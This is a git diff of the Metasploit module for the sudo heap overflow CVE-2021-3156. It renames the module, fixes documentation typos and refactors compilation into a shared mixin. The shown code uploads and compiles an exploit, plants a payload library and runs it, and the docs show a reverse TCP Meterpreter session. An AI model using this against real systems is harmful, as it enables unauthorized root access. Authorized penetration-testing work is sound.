diff --git a/documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md b/documentation/modules/exploit/linux/local/sudo_baron_samedit.md similarity index 89% rename from documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md rename to documentation/modules/exploit/linux/local/sudo_baron_samedit.md index bec5f07033..43e90f0ac2 100644 --- a/documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md +++ b/documentation/modules/exploit/linux/local/sudo_baron_samedit.md @@ -1,14 +1,14 @@ ## Vulnerable Application A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker -to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2 +to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker controlled library which results in it being loaded with the elevated privileges held by sudo. ### Manual Target -The exploit requires a number of lengths / offsets to function correction. The manual target can be used to specify +The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at [blasty/CVE-2021-3156][1]. @@ -41,7 +41,7 @@ Example steps in this format (is also in the PR): 1. Install the application 1. Start msfconsole -1. Do: `use exploit/linux/local/cve_2021_3156_sudo` +1. Do: `use exploit/linux/local/sudo_baron_samedit` 1. Set the necessary options (target, payload, etc.) 1. Do: `run` @@ -82,15 +82,15 @@ BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1... -msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_3156_sudo +msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp -msf6 exploit(linux/local/cve_2021_3156_sudo) > set SESSION 1 +msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1 SESSION => 1 -msf6 exploit(linux/local/cve_2021_3156_sudo) > set LHOST 192.168.159.128 +msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 -msf6 exploit(linux/local/cve_2021_3156_sudo) > set TARGET 1 +msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET 1 TARGET => 1 -msf6 exploit(linux/local/cve_2021_3156_sudo) > exploit +msf6 exploit(linux/local/sudo_baron_samedit) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/lib/msf/core/post/linux/compile.rb b/lib/msf/core/post/linux/compile.rb index fa1500de5e..08d6cfdd04 100644 --- a/lib/msf/core/post/linux/compile.rb +++ b/lib/msf/core/post/linux/compile.rb @@ -15,14 +15,14 @@ module Compile end def live_compile? - return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + return false unless %w{ Auto True }.include?(datastore['COMPILE']) if has_gcc? vprint_good 'gcc is installed' return true end - unless datastore['COMPILE'].eql? 'Auto' + unless datastore['COMPILE'] == 'Auto' fail_with Module::Failure::BadConfig, 'gcc is not installed. Set COMPILE False to upload a pre-compiled executable.' end end @@ -44,7 +44,10 @@ module Compile unless output.blank? print_error output - fail_with Module::Failure::BadConfig, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable." + message = "#{path}.c failed to compile." + # don't mention the COMPILE option if it was deregistered + message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE') + fail_with Module::Failure::BadConfig, message end chmod path diff --git a/modules/exploits/linux/local/cve_2021_3156_sudo.rb b/modules/exploits/linux/local/sudo_baron_samedit.rb similarity index 74% rename from modules/exploits/linux/local/cve_2021_3156_sudo.rb rename to modules/exploits/linux/local/sudo_baron_samedit.rb index 4f0f096d60..1601d4dc3c 100644 --- a/modules/exploits/linux/local/cve_2021_3156_sudo.rb +++ b/modules/exploits/linux/local/sudo_baron_samedit.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::File include Msf::Post::Unix + include Msf::Post::Linux::Compile include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper @@ -17,10 +18,10 @@ class MetasploitModule < Msf::Exploit::Local super( update_info( info, - 'Name' => 'Heap-Based Buffer Overflow in Sudo', + 'Name' => 'Sudo Heap-Based Buffer Overflow', 'Description' => %q( A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker - to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2 + to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker controlled library which results in it being loaded with the elevated privileges held by sudo. @@ -60,17 +61,15 @@ class MetasploitModule < Msf::Exploit::Local ) ) - register_options( - [ - OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]) - ], self.class - ) + register_options([ + OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]) + ]) - register_advanced_options( - [ - OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/) - ] - ) + register_advanced_options([ + OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/) + ]) + + deregister_options('COMPILE') end def get_versions @@ -81,13 +80,6 @@ class MetasploitModule < Msf::Exploit::Local versions[:sudo] = version if version =~ /^\d/ end - # this libc version check will need to be updated to support non-linux targets like OSX - output = cmd_exec("ldd --version") - if output - version = output.split("\n").first.split(' ').last - versions[:libc] = version if version =~ /^\d/ - end - versions end @@ -103,6 +95,11 @@ class MetasploitModule < Msf::Exploit::Local [Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')], ] + if sudo_version == '1.8.31' + # Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31 + return CheckCode::Detected("sudo #{sudo_version} maybe a vulnerable build.") + end + if vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) } return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.") end @@ -115,25 +112,6 @@ class MetasploitModule < Msf::Exploit::Local write_file path, data end - def upload_and_compile(path, data) - upload "#{path}.c", data - register_files_for_cleanup("#{path}.c") - - gcc_cmd = "gcc -o #{path} #{path}.c -lutil" - if session.type.eql? 'shell' - gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" - end - - output = cmd_exec gcc_cmd - unless output.blank? - print_error output - fail_with Failure::Unknown, "#{path}.c failed to compile" - end - register_files_for_cleanup(path) - - cmd_exec "chmod +x #{path}" - end - def exploit if target.name == 'Manual' fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank? @@ -146,13 +124,10 @@ class MetasploitModule < Msf::Exploit::Local path = datastore['WritableDir'] cmd_exec("mkdir -p #{path}/libnss_X") - register_dirs_for_cleanup("#{path}/libnss_X") - - file_name = rand_text_alphanumeric rand(5..10) - upload_and_compile("#{path}/#{file_name}", ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-3156', 'exploit.c'))) + file_name = rand_text_alphanumeric(5..10) + upload_and_compile("#{path}/#{file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil') upload("#{path}/libnss_X/P0P_SH3LLZ_ .so.2", generate_payload_dll) - cmd_exec("#{path}/#{file_name} #{arguments}") end end